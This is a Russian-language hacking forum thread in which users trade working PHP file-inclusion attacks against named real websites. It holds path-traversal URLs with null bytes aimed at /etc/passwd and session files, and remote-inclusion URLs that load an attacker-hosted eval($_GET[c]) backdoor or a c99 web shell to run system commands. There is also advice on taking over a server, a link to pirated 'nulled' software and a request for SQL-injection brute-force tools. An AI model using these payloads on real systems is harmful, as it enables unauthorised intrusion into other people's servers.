Кстати, был тут человек в моа, Нитрокс, старички помнят. Вот мы с ним около года назад тоже спорили по поводу инклудов. Он ещё считал что при инклуде не любой файл будет выполняться как пшп-код. Так что это заблуждение очень распространено, а уж про читалки файлов я вообще молчу
2 Grey: Code: http://www.cyl.ru/index.php?page=3&lang=../../../../../../../../../../../../../../../../../../../../../../../../../tmp/sess_0quou9ch5ubkmtpv5cuotojhd7%00 Как бы дальше типо достаточно что-то купить типо, указать мыло и прочее и обойти фильтр
Хм, может ты нам по коду покажешь где ты там include() увидел? http://www.cyl.ru/index.php?page=3&lang=../index.php%00
)) Да, там file, готов понести самое жестокое наказание и впредь думать, прежде чем писать Grey: ну тогда начинай подготовку к наказанию - запасись хАААрошей клизмой.
Народ,кто-нибудь может показать пример обхода инклуда на этом сайте? http://www.alertsite.com/phplive/image.php?l=ml'&x=1&deptid=0 Классический пример имхо Переменная l
allow_url_fopen.Не ? В статье какой-то было.Сюда относят функции: file(),file_get_contents(),fopen(),popen().Вроде все.Если стоит эта директива в ON,то можно использовать.
и что ты с этим сделаешь? прочитаешь код своего шелленга удалённого? разве что еси в саенте eval(file($_GET[blablabla])); ну или систем(file($_GET[blablabla]); .......
Warning: getimagesize(/usr/virtualweb/netdirekt.de/html/c/cms/images/index_-over.jpg): failed to open stream: No such file or directory in /usr/virtualweb/netdirekt.de/html/c/cms/front_content.php(884) : eval()'d code on line 520 Здесь,я так понял,ничего не сделаешь) http://www.netdirect.de/c/cms/front_content.php?idart=132&idcat=../../../../../../../../../../etc/passwd%00 PHP: Warning: auth_loginform(http://neu.netdirekt.de/c/cms/front_crcloginform.inc.php): failed to open stream: no suitable wrapper could be found in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654 PHP: Warning: auth_loginform(): URL file-access is disabled in the server configuration in /usr/virtualweb/netdirekt.de/html/c/conlib/local.php on line 654 Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ?
Какой смысл отрубать allow_url_fopen() тогда,если это не влечёт проблем с безопасностью ? Прихоть такая чтоли ? до каких то там версий пшп (5.0.* чёто такое) allow_url_fopen растространялось и на file() и на include(), потом ввели allow_url_include
Вот эта статья https://forum.antichat.ru/thread91807.html Сделай так http://www.alertsite.com/phplive/image.php?l=image.php/./.[...]/././. Будет Это phplive, там фильтрация+file_exists+is_dir. Вот этот двиг нулленный - http://rapidshare.com/files/86879595/Phplive.3.2.2.NULLED-FiXED-LOGOUT.rar смотри сурс image.php, там правда закоментили кусок кода (видимо химичили пока делали нулл), но сайте все работает
Люди подскажите плиз. нашол сайт с пхп инклудом. зарегал хостинг, скрипт на пхп написал такой. <?php print("<h3>SHELL</h3>"); print(system("ls -al")); ?> подставил так http://catenabrasil.com/portal/index.php?arq=http://mysite.ru/mysite.php отобразилось токо слов SHELL. Подскажите, как взять сервак под контроль?
Обычный RFI, заливаешь УЖЕ полноценный шелл хоть на народ.ру и просто указываешь ссылку на него - только что проверил на с99-шелле Но если ты так любишь извращения, то залей на народ.ру (свой сайт) такой eval.txt: PHP: <?=eval($_GET[c])?> и потом подключи вот так: Code: http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=phpinfo(); http://catenabrasil.com/portal/index.php?arq=http://ник_на_народе.narod.ru/eval.txt&c=system('ls%20-la'); но в последнем случае пишет: Code: Warning: system() has been disabled for security reasons так что не парься и подключай нормальный шелл сразу
Подскажите программы,работающие независимо друг друга: 1. Для автоматизированного подбора полей. 2. Для автоматизированного подбора столбцов. 3. Для брута имен столбцов. SIPT 4.0 НЕ ПОДХОДИТ))
